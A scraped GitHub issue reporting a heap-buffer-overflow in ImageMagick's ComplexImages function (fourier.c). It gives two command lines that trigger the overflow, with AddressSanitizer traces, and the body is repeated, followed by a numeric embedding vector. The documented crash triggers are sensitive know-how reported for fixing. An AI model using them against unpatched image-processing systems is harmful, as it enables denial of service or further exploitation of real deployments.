https://github.com/ImageMagick/ImageMagick/issues/1597
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a heap-buffer-overflow in MagickCore/fourier.c:305:45 in ComplexImages. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run_cmd: `magick -seed 0 -treedepth 71 "(" magick:logo +repage ")" "(" magick:granite -white-threshold 0% -cycle 256 -lat 815 ")" -bordercolor rgb"("101,151,20")" -blue-primary 638,241 -print "0O." -complex multiply tmp ` Second one also can trigger. cmd: `magick -seed 0 "(" magick:logo +repage ")" "(" magick:logo +repage ")" -render -size 2872 -complex multiply -quiet tmp ` Here's ASAN result. ``` ==16842==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61e000000a80 at pc 0x7fea5bb0c52f bp 0x7fff5c11c590 sp 0x7fff5c11c588 READ of size 4 at 0x61e000000a80 thread T0 #0 0x7fea5bb0c52e in ComplexImages MagickCore/fourier.c:305:45 #1 0x7fea5b3328c1 in CLIListOperatorImages MagickWand/operation.c:3890:22 #2 0x7fea5b33e34e in CLIOption MagickWand/operation.c:5276:14 #3 0x7fea5b17fa99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #4 0x7fea5b180d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #5 0x7fea5b1caba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #6 0x526f95 in MagickMain utilities/magick.c:149:10 #7 0x5268e1 in main utilities/magick.c:180:10 #8 0x7fea55c41b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41b069 in _start (install/bin/magick+0x41b069) 0x61e000000a80 is located 0 bytes to the right of 2560-byte region [0x61e000000080,0x61e000000a80) allocated by thread T0 here: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7fea5bbb9666 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7fea5b910d5c in AcquireCacheNexusPixels MagickCore/cache.c:4968:37 #3 0x7fea5b8fe1c4 in SetPixelCacheNexusPixels MagickCore/cache.c:5076:12 #4 0x7fea5b8f5b05 in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10 #5 0x7fea5b913f36 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10 #6 0x7fea5bb0ae5d in ComplexImages MagickCore/fourier.c:250:8 #7 0x7fea5b3328c1 in CLIListOperatorImages MagickWand/operation.c:3890:22 #8 0x7fea5b33e34e in CLIOption MagickWand/operation.c:5276:14 #9 0x7fea5b17fa99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7fea5b180d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7fea5b1caba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7fea55c41b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:305:45 in ComplexImages ``` Here's the ASAN result for second cmd ``` ==16863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2a0831b800 at pc 0x7f2a1747e649 bp 0x7ffd7c094350 sp 0x7ffd7c094348 WRITE of size 4 at 0x7f2a0831b800 thread T0 #0 0x7f2a1747e648 in ComplexImages MagickCore/fourier.c:305:18 #1 0x7f2a16ca48c1 in CLIListOperatorImages MagickWand/operation.c:3890:22 #2 0x7f2a16cb034e in CLIOption MagickWand/operation.c:5276:14 #3 0x7f2a16af1a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #4 0x7f2a16af2d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #5 0x7f2a16b3cba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #6 0x526f95 in MagickMain utilities/magick.c:149:10 #7 0x5268e1 in main utilities/magick.c:180:10 #8 0x7f2a115b3b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41b069 in _start (install/bin/magick+0x41b069) 0x7f2a0831b800 is located 0 bytes to the right of 3686400-byte region [0x7f2a07f97800,0x7f2a0831b800) allocated by thread T0 here: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7f2a1752b666 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7f2a172746ac in OpenPixelCache MagickCore/cache.c:3728:46 #3 0x7f2a1727a991 in GetImagePixelCache MagickCore/cache.c:1754:18 #4 0x7f2a17280c59 in SyncImagePixelCache MagickCore/cache.c:5494:28 #5 0x7f2a174defc1 in SetImageStorageClass MagickCore/image.c:2627:10 #6 0x7f2a1747c4f7 in ComplexImages MagickCore/fourier.c:185:7 #7 0x7f2a16ca48c1 in CLIListOperatorImages MagickWand/operation.c:3890:22 #8 0x7f2a16cb034e in CLIOption MagickWand/operation.c:5276:14 #9 0x7f2a16af1a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7f2a16af2d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7f2a16b3cba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7f2a115b3b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:305:18 in ComplexImages ``` Thanks. ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-17 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow in MagickCore/fourier.c:305:45 in ComplexImages
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1597/comments
2
2019-06-17T03:51:17
2019-07-08T01:50:56Z
https://github.com/ImageMagick/ImageMagick/issues/1597
456,730,033
1,597
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : heap-buffer-overflow in MagickCore/fourier.c:305:45 in ComplexImages Issue date: --- start body --- ### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a heap-buffer-overflow in MagickCore/fourier.c:305:45 in ComplexImages. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run_cmd: `magick -seed 0 -treedepth 71 "(" magick:logo +repage ")" "(" magick:granite -white-threshold 0% -cycle 256 -lat 815 ")" -bordercolor rgb"("101,151,20")" -blue-primary 638,241 -print "0O." -complex multiply tmp ` Second one also can trigger. cmd: `magick -seed 0 "(" magick:logo +repage ")" "(" magick:logo +repage ")" -render -size 2872 -complex multiply -quiet tmp ` Here's ASAN result. ``` ==16842==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61e000000a80 at pc 0x7fea5bb0c52f bp 0x7fff5c11c590 sp 0x7fff5c11c588 READ of size 4 at 0x61e000000a80 thread T0 #0 0x7fea5bb0c52e in ComplexImages MagickCore/fourier.c:305:45 #1 0x7fea5b3328c1 in CLIListOperatorImages MagickWand/operation.c:3890:22 #2 0x7fea5b33e34e in CLIOption MagickWand/operation.c:5276:14 #3 0x7fea5b17fa99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #4 0x7fea5b180d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #5 0x7fea5b1caba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #6 0x526f95 in MagickMain utilities/magick.c:149:10 #7 0x5268e1 in main utilities/magick.c:180:10 #8 0x7fea55c41b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41b069 in _start (install/bin/magick+0x41b069) 0x61e000000a80 is located 0 bytes to the right of 2560-byte region [0x61e000000080,0x61e000000a80) allocated by thread T0 here: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7fea5bbb9666 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7fea5b910d5c in AcquireCacheNexusPixels MagickCore/cache.c:4968:37 #3 0x7fea5b8fe1c4 in SetPixelCacheNexusPixels MagickCore/cache.c:5076:12 #4 0x7fea5b8f5b05 in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10 #5 0x7fea5b913f36 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10 #6 0x7fea5bb0ae5d in ComplexImages MagickCore/fourier.c:250:8 #7 0x7fea5b3328c1 in CLIListOperatorImages MagickWand/operation.c:3890:22 #8 0x7fea5b33e34e in CLIOption MagickWand/operation.c:5276:14 #9 0x7fea5b17fa99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7fea5b180d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7fea5b1caba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7fea55c41b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:305:45 in ComplexImages ``` Here's the ASAN result for second cmd ``` ==16863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2a0831b800 at pc 0x7f2a1747e649 bp 0x7ffd7c094350 sp 0x7ffd7c094348 WRITE of size 4 at 0x7f2a0831b800 thread T0 #0 0x7f2a1747e648 in ComplexImages MagickCore/fourier.c:305:18 #1 0x7f2a16ca48c1 in CLIListOperatorImages MagickWand/operation.c:3890:22 #2 0x7f2a16cb034e in CLIOption MagickWand/operation.c:5276:14 #3 0x7f2a16af1a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #4 0x7f2a16af2d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #5 0x7f2a16b3cba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #6 0x526f95 in MagickMain utilities/magick.c:149:10 #7 0x5268e1 in main utilities/magick.c:180:10 #8 0x7f2a115b3b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41b069 in _start (install/bin/magick+0x41b069) 0x7f2a0831b800 is located 0 bytes to the right of 3686400-byte region [0x7f2a07f97800,0x7f2a0831b800) allocated by thread T0 here: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7f2a1752b666 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7f2a172746ac in OpenPixelCache MagickCore/cache.c:3728:46 #3 0x7f2a1727a991 in GetImagePixelCache MagickCore/cache.c:1754:18 #4 0x7f2a17280c59 in SyncImagePixelCache MagickCore/cache.c:5494:28 #5 0x7f2a174defc1 in SetImageStorageClass MagickCore/image.c:2627:10 #6 0x7f2a1747c4f7 in ComplexImages MagickCore/fourier.c:185:7 #7 0x7f2a16ca48c1 in CLIListOperatorImages MagickWand/operation.c:3890:22 #8 0x7f2a16cb034e in CLIOption MagickWand/operation.c:5276:14 #9 0x7f2a16af1a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7f2a16af2d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7f2a16b3cba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7f2a115b3b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:305:18 in ComplexImages ``` Thanks. ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-17 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! --> --- end body ---
6,354
[ -0.012725596316158772, 0.017470376566052437, -0.014734901487827301, 0.0012602218193933368, 0.03939647227525711, 0.00011864151019835845, -0.04134232550859451, 0.0421319454908371, -0.02563449740409851, 0.036830201745033264, -0.02972360886633396, -0.01552452240139246, 0.03333330899477005, 0.014678499661386013, 0.004314717371016741, 0.014361240901052952, -0.027918759733438492, 0.018401000648736954, -0.03948107361793518, -0.012006476521492004, -0.00995487067848444, -0.0036378989461809397, -0.021263379603624344, 0.03970668092370033, -0.032318081706762314, 0.013656222261488438, -0.009849118068814278, 0.010638739913702011, 0.0030492080841213465, 0.021037772297859192, 0.028059763833880424, 0.02146078459918499, -0.0030033818911761045, 0.044105999171733856, 0.028637880459427834, -0.01663845218718052, 0.02619851380586624, 0.08962204307317734, 0.008671736344695091, 0.03680200129747391, 0.0016885210061445832, -0.04357018694281578, 0.010399033315479755, 0.010878446511924267, -0.013804275542497635, -0.020262252539396286, -0.005534400697797537, -0.0264523196965456, -0.01998024433851242, 0.03071063570678234, 0.034207530319690704, -0.008396778255701065, -0.022969525307416916, -0.029356999322772026, 0.004339393228292465, -0.017146067693829536, 0.022955425083637238, 0.035109955817461014, 0.008488431572914124, 0.02071346342563629, 0.012062878347933292, 0.03996048867702484, -0.018725309520959854, 0.007734060753136873, 0.005312319844961166, -0.0017378723714500666, 0.024097556248307228, 0.014664399437606335, -0.014262538403272629, 0.02071346342563629, -0.014142684638500214, -0.02285672165453434, 0.022899024188518524, 0.01752677746117115, 0.012387187220156193, 0.012492939829826355, 0.03243088349699974, -0.0002502818242646754, -0.05944721773266792, 0.03759162500500679, -0.052368827164173126, 0.024548768997192383, -0.06260570138692856, 0.036971207708120346, 0.04018609598278999, 0.007445002906024456, -0.03917086496949196, -0.06807665526866913, -0.05019736662507057, -0.005967987701296806, -0.001743159955367446, 0.0006323140696622431, -0.00034678130759857595, 0.029441602528095245, 0.029272397980093956, 0.014340090565383434, -0.03736601769924164, 0.0003097678127232939, -0.03401012718677521, -0.0006274670595303178, -0.01572192832827568, -0.01044133398681879, -0.004290041979402304, 0.0129018509760499, 0.014988708309829235, 0.007194720674306154, -0.022743919864296913, -0.03307950124144554, 0.01981103979051113, 0.1152847409248352, -0.024450065568089485, -0.03203607350587845, -0.004928084090352058, 0.014276638627052307, -0.014114484190940857, 0.037732627242803574, 0.003054495668038726, 0.00743090221658349, -0.02832767181098461, -0.01778058335185051, -0.020614761859178543, -0.02440776489675045, -0.010758592747151852, -0.006426250096410513, -0.02875068224966526, 0.04348558560013771, 0.015834731981158257, -0.02154538594186306, -0.0031179473735392094, -0.0014919969253242016, -0.03203607350587845, -0.01720246858894825, 0.0030738837085664272, -0.029554404318332672, -0.02924419566988945, -0.01785108633339405, -0.014184986241161823, 0.04424700513482094, 0.03417932987213135, -0.009193450212478638, -0.06638460606336594, -0.03104904480278492, 0.008826840668916702, 0.033953726291656494, -0.005668354220688343, 0.018697109073400497, -0.024717973545193672, 0.02171459048986435, 0.006436825264245272, -0.044923823326826096, -0.02694583311676979, 0.021094175055623055, 0.023307934403419495, -0.020995471626520157, 0.047800302505493164, -0.016074437648057938, 0.032318081706762314, 0.029131393879652023, -0.025183286517858505, -0.042865168303251266, 0.005749431438744068, -0.02776365540921688, 0.0021362081170082092, -0.00851663202047348, -0.005312319844961166, -0.0179497878998518, -0.002726661739870906, 0.031979672610759735, 0.012662144377827644, 0.03409472852945328, 0.019839240238070488, 0.006380423903465271, -0.00852368213236332, 0.009271002374589443, -0.05673994496464729, 0.010039472952485085, 0.009538909420371056, 0.005259443074464798, -0.024675671011209488, -0.02662152424454689, 0.0030597832519561052, -0.027622651308774948, -0.005114914383739233, 0.0006653618765994906, 0.05665534362196922, -0.0014047507429495454, 0.007705859839916229, -0.032064273953437805, 0.006105466280132532, 0.006345172878354788, -0.002301887609064579, -0.009743365459144115, 0.012457689270377159, -0.04858992248773575, 0.04218835011124611, -0.013416515663266182, -0.034856148064136505, -0.02605750970542431, 0.017315272241830826, -0.019782839342951775, 0.0005305269733071327, -0.012232082895934582, -0.03423573076725006, -0.009637612849473953, -0.001042547170072794, 0.015595024451613426, -0.02237730845808983, 0.026494622230529785, 0.011583465151488781, -0.002606808440759778, -0.02425266057252884, -0.013183859176933765, 0.020910870283842087, 0.018302299082279205, -0.040101490914821625, 0.011682167649269104, -0.014664399437606335, -0.010265079326927662, -0.007226446643471718, -0.011823171749711037, 0.009271002374589443, -0.016257742419838905, -0.0017475663917139173, -0.022983625531196594, -0.030682435259222984, 0.006190068554133177, 0.00018506753258407116, -0.00199520424939692, -0.04576984792947769, -0.016328245401382446, 0.00475182943046093, -0.013733773492276669, -0.009771565906703472, 0.01179497130215168, 0.01885221339762211, 0.002689648186787963, 0.016680754721164703, 0.024182157590985298, 0.0025962332729250193, 0.019782839342951775, 0.010864346288144588, 0.006814010441303253, -0.030682435259222984, 0.001989916665479541, 0.030851639807224274, 0.03609698265790939, -0.011505912989377975, 0.017103765159845352, -0.019049618393182755, 0.013811325654387474, -0.0019529032288119197, -0.004237165208905935, 0.0012073453981429338, -0.0024005903396755457, -0.0014541021082550287, -0.008488431572914124, 0.012401287443935871, 0.002635009353980422, -0.0069303386844694614, -0.03843764588236809, 0.03135925531387329, 0.0050549875013530254, 0.0025733201764523983, 0.021488985046744347, 0.020924970507621765, -0.01778058335185051, 0.010511836037039757, 0.019768739119172096, -0.006859836634248495, -0.006154817529022694, 0.029526203870773315, -0.024548768997192383, -0.0322616770863533, -0.05126899480819702, -0.017103765159845352, -0.00024190971453208476, 0.028158467262983322, 0.014551595784723759, 0.013529318384826183, -0.002571557415649295, 0.012866600416600704, 0.035194557160139084, -0.010102924890816212, 0.02106597274541855, 0.00782571267336607, 0.010053574107587337, 0.03508175536990166, -0.02646641992032528, -0.023082328960299492, -0.01793568767607212, -0.008100670762360096, 0.0017581416759639978, -0.054512083530426025, 0.01011702511459589, 0.0032007871195673943, 0.0196700356900692, 0.01606033742427826, -0.026833031326532364, -0.018217695876955986, -0.006316971965134144, -0.017836986109614372, -0.02442186512053013, -0.0023864898830652237, 0.0003335622022859752, -0.03606878221035004, 0.01596163399517536, -0.022504212334752083, 0.0026173838414251804, -0.012972353026270866, -0.011188654229044914, 0.023068228736519814, -0.01858430542051792, 0.009249852038919926, -0.011534114368259907, -0.035109955817461014, -0.0014391203876584768, 0.021192876622080803, -0.02270161733031273, 0.00012525107013061643, -0.012161580845713615, -0.03471514582633972, -0.013536368496716022, -0.026720227673649788, 0.009059496223926544, -0.013310762122273445, -0.007931466214358807, -0.013818376697599888, 0.02523968741297722, -0.09131408482789993, 0.02532428875565529, 0.002571557415649295, -0.03956567868590355, -0.01662435196340084, -0.019641835242509842, 0.035843174904584885, -0.035194557160139084, -0.01842920109629631, 0.033474311232566833, 0.014325990341603756, 0.011125203222036362, -0.025211486965417862, 0.02284262143075466, -0.004720103461295366, -0.030738836154341698, 0.0198956411331892, -0.01563732512295246, 0.005685979966074228, 0.0036096982657909393, 0.014523395337164402, -0.02662152424454689, 0.0008583608432672918, 0.051804810762405396, 0.0048822578974068165, 0.024294961243867874, 0.03660459816455841, 0.005541450809687376, -0.0108079444617033, 0.003320640418678522, 0.033953726291656494, -0.01711786538362503, -0.014791302382946014, -0.039114464074373245, -0.010744492523372173, -0.00978566613048315, 0.010215728543698788, -0.0047095282934606075, -0.02777775563299656, -0.01486180443316698, -0.039763081818819046, -0.008826840668916702, -0.015101511031389236, 0.06852786242961884, -0.02563449740409851, 0.0059926630929112434, -0.05327124893665314, -0.028144367039203644, 0.011576415039598942, 0.000811653328128159, -0.025267887860536575, 0.007811612915247679, -0.027791855856776237, 0.04390859603881836, 0.04562884196639061, -0.029272397980093956, 0.02505638264119625, 0.03547656536102295, -0.01670895516872406, 0.015848832204937935, 0.0014770152047276497, -0.017879286780953407, -0.050817783921957016, 0.05217142030596733, -0.040016889572143555, -0.02669202722609043, -0.01704736426472664, 0.021982498466968536, -0.009383805096149445, -0.01769598200917244, 0.032148875296115875, -0.04641846567392349, 0.01686405949294567, -0.03327690437436104, 0.030118420720100403, 0.011520013213157654, -0.0052629681304097176, 0.04475461691617966, 0.013014654628932476, -0.007564856205135584, 0.02153128571808338, 0.00900309532880783, 0.03330510854721069, 0.0018683008383959532, -0.038381244987249374, -0.008537782356142998, 0.020600661635398865, 0.010666940361261368, 0.01539761945605278, -0.021347980946302414, -0.015369418077170849, -0.0140862837433815, -0.015115611255168915, 0.012549341656267643, -0.004829381592571735, 0.037845429033041, 0.00901014544069767, 0.011153403669595718, 0.025916505604982376, 0.013825426809489727, -0.006909188348799944, -0.010822044685482979, -0.031500257551670074, 0.0012831349158659577, 0.011576415039598942, 0.014361240901052952, -0.02497177943587303, -0.015778329223394394, -0.04007329046726227, -0.007614207454025745, -0.021080074831843376, -0.00595741206780076, 0.019106021150946617, 0.0425831601023674, -0.03336150944232941, -0.04052450507879257, -0.03006201796233654, -0.025126883760094643, -0.02311052940785885, 0.01359277032315731, 0.00007898417970864102, -0.02669202722609043, -0.015989836305379868, 0.03815563768148422, -0.014100383967161179, -0.030908040702342987, 0.022504212334752083, -0.014495194889605045, -0.009567110799252987, -0.02079806663095951, 0.022870821878314018, -0.01842920109629631, 0.003590310225263238, 0.02997741661965847, -0.004889308009296656, -0.03087984025478363, 0.0144105926156044, 0.02972360886633396, 0.008904392831027508, -0.0073674507439136505, 0.0017563790315762162, -0.02179919369518757, 0.02686123177409172, 0.039452873170375824, -0.010187527164816856, 0.013698522932827473, -0.02088266797363758, 0.02186969481408596, -0.012746746651828289, -0.005527350585907698, 0.0005106983007863164, -0.049605149775743484, 0.030259424820542336, -0.03336150944232941, -0.007917365990579128, 0.005231242626905441, 0.03539196401834488, -0.003225462744012475, -0.004237165208905935, -0.0036660998594015837, -0.013458816334605217, 0.02112237550318241, 0.0024622795172035694, 0.01061053853482008, 0.010829094797372818, -0.012380137108266354, -0.006852786522358656, 0.006461501121520996, -0.030936243012547493, -0.016003936529159546, 0.04216014966368675, 0.013205009512603283, 0.0038176788948476315, -0.000054060652473708615, 0.03186686709523201, -0.023900151252746582, 0.012323735281825066, -0.0537506639957428, -0.031810466200113297, 0.008241674862802029, -0.038691453635692596, -0.03155665844678879, 0.02326563373208046, -0.02564859762787819, 0.02155948616564274, -0.03316410258412361, -0.005756481550633907, -0.023152830079197884, 0.029949216172099113, -0.021573588252067566, 0.019388027489185333, 0.01474900171160698, 0.008065419271588326, -0.028877586126327515, 0.026438219472765923, 0.04125772416591644, 0.05882680043578148, -0.006486176513135433, 0.04038349911570549, 0.0007274916861206293, 0.019923841580748558, -0.018880413845181465, 0.01965593546628952, -0.02808796428143978, -0.0140862837433815, 0.018161294981837273, 0.017738282680511475, 0.016765356063842773, -0.03341791033744812, -0.001975816208869219, -0.012196832336485386, -0.009976021945476532, -0.01835869997739792, 0.0391426645219326, -0.033784519881010056, -0.02554989606142044, -0.02532428875565529, 0.022546513006091118, -0.0009341504191979766, 0.01425548829138279, -0.007318099495023489, 0.0001988374424399808, 0.004945709835737944, -0.013910029083490372, 0.02243371121585369, 0.025578096508979797, 0.014177936129271984, 0.013056955300271511, 0.0076494584791362286, -0.00638747401535511, 0.01208402868360281, 0.01486180443316698, 0.009263952262699604, -0.009940770454704762, 0.02106597274541855, 0.0179497878998518, 0.003121472429484129, -0.01752677746117115, 0.01159051526337862, 0.02302592620253563, -0.052453428506851196, -0.020699363201856613, 0.020783966407179832, 0.0010663415305316448, -0.0006327547016553581, -0.005421597510576248, -0.016018036752939224, 0.004850531928241253, -0.006006763782352209, -0.004861107561737299, 0.00949660874903202, -0.011252106167376041, 0.042301151901483536, -0.029441602528095245, 0.009447257034480572, 0.00415608799085021, 0.010342631489038467, -0.02326563373208046, 0.011823171749711037, -0.004110261797904968, -0.0008292788406834006, -0.013155657798051834, 0.007938516326248646, 0.03897346183657646, -0.019035518169403076, 0.0027813008055090904, 0.008749288506805897, -0.0057459063827991486, 0.010088824667036533, 0.004822331480681896, 0.01950083114206791, -0.012499989941716194, -0.018542004749178886, 0.016497449949383736, 0.011280307546257973, -0.051804810762405396, -0.026099810376763344, -0.013338963501155376, 0.011477712541818619, 0.013606870546936989, 0.004593200050294399, 0.022010698914527893, 0.03189506754279137, 0.040016889572143555, 0.0040714857168495655, 0.005943311844021082, 0.015989836305379868, 0.004230115097016096, -0.01405103225260973, 0.020036645233631134, -0.02767905406653881, -0.019232923164963722, 0.009165249764919281, -0.0542018748819828, 0.001979341497644782, -0.007931466214358807, 0.018711209297180176, 0.020093047991394997, -0.01883811317384243, 0.0015016909455880523, -0.012718546204268932, -0.01786518655717373, -0.000744676508475095, 0.04396499693393707, 0.0264523196965456, -0.01941622793674469, -0.02244781143963337, 0.012633943930268288, 0.014551595784723759, -0.028877586126327515, -0.02057245932519436, -0.017822885885834694, -0.015609124675393105, 0.0005384584073908627, -0.03341791033744812, -0.015327117405831814, -0.013021704740822315, 0.005231242626905441, -0.02382964827120304, 0.018908614292740822, 0.01421318668872118, 0.04289336875081062, -0.03262828662991524, 0.011816121637821198, 0.0018418626859784126, 0.018372800201177597, -0.001257578027434647, -0.0074943541549146175, 0.04458541423082352, 0.0494641475379467, -0.0020974320359528065, -0.021587688475847244, -0.02563449740409851, 0.0009729265002533793, -0.029836412519216537, 0.0022877873852849007, 0.014763101935386658, -0.007663558702915907, -0.040101490914821625, -0.04709528386592865, 0.03629438951611519, 0.03127465024590492, 0.014290738850831985, -0.009426106698811054, 0.016271842643618584, 0.006637755781412125, -0.0012099891901016235, -0.03736601769924164, 0.0445290133357048, 0.005530875641852617, -0.02605750970542431, 0.01703326404094696, 0.02539479173719883, -0.028736582025885582, -0.006468551233410835, 0.009320354089140892, -0.02016354911029339, 0.00021227687830105424, -0.0014188510831445456, 0.008262825198471546, -0.0019035518635064363, -0.02629721537232399, 0.04114491865038872, -0.029046790674328804, 0.00595741206780076, -0.0011015924392268062, -0.008763388730585575, -0.005107864271849394, 0.007839813828468323, 0.00020765018416568637, -0.007346299942582846, -0.00946135725826025, -0.028073864057660103, -0.004219539929181337, 0.008453180082142353, 0.01776648312807083, 0.010427233763039112, 0.0182740967720747, -0.0016462198691442609, 0.013451766222715378, -0.029751809313893318, -0.008417929522693157, -0.019275225698947906, 0.018485603854060173, -0.048533521592617035, 0.009870268404483795, 0.006105466280132532, -0.04808231070637703, -0.0055379257537424564, -0.0014250200474634767, -0.023138729855418205, -0.01277494803071022, -0.001989916665479541, -0.013818376697599888, -0.027298342436552048, -0.06486176699399948, 0.02325153350830078, 0.023406637832522392, -0.0012901851441711187, -0.016173141077160835, 0.021023672074079514, 0.01703326404094696, -0.007261697668582201, -0.011379010044038296, -0.008904392831027508, 0.009320354089140892, -0.015609124675393105, -0.01076564285904169, 0.025775501504540443, -0.0024464165326207876, 0.01975463703274727, 0.008037218824028969, 0.004191339015960693, -0.005626053083688021, 0.025084583088755608, -0.021897897124290466, 0.012838399969041348, -0.0035391964484006166, 0.01323320996016264, 0.002925829729065299, -0.006891562603414059, 0.021178776398301125, 0.006588404532521963, 0.006154817529022694, -0.006366323214024305, -0.006532002706080675, -0.01195712573826313, -0.01522841490805149, 0.026353618130087852, -0.03358711302280426, -0.004018609412014484, -0.04196274280548096, 0.02474617399275303, -0.00514311483129859, 0.022899024188518524, 0.007275797892361879, 0.010659890249371529, -0.004180763848125935, 0.0015096223214641213, -0.00654962845146656, 0.03358711302280426, -0.014593897387385368, 0.022320907562971115, 0.007170045282691717, -0.02268751710653305, -0.00012260724906809628, -0.0017043838743120432, -0.028962189331650734, 0.005255918018519878, 0.00573533121496439, 0.02997741661965847, 0.014065133407711983, -0.007522554602473974, 0.002642059465870261, -0.0509587861597538, 0.05273543670773506, -0.014607997611165047, -0.011491812765598297, 0.001601274823769927, -0.011068801395595074, -0.017977990210056305, 0.01587703265249729, 0.005358146037906408, -0.022983625531196594, 0.029187794774770737, -0.0135504687204957, -0.033869121223688126, -0.010088824667036533, 0.0003262916870880872, -0.012746746651828289, -0.036660999059677124, -0.03629438951611519, -0.02243371121585369, 0.024435965344309807, -0.026325417682528496, -0.020346853882074356, -0.0185984056442976, -0.03381272032856941, -0.013670322485268116, 0.04314717650413513, -0.01711786538362503, 0.01809079200029373, 0.015298916958272457, 0.008897342719137669, 0.0003485438646748662, 0.029610807076096535, 0.008403828367590904, -0.02251831255853176, -0.0017017400823533535, -0.002166171558201313, -0.011005349457263947, -0.0065566785633563995, -0.032797493040561676, 0.0007900621276348829, -0.025775501504540443, -0.03364351764321327, -0.006479126401245594, -0.016285942867398262, 0.0041173119097948074, 0.007691759616136551, 0.011252106167376041, 0.007853914052248001, -0.007945566438138485, -0.019373927265405655, -0.005400447174906731, 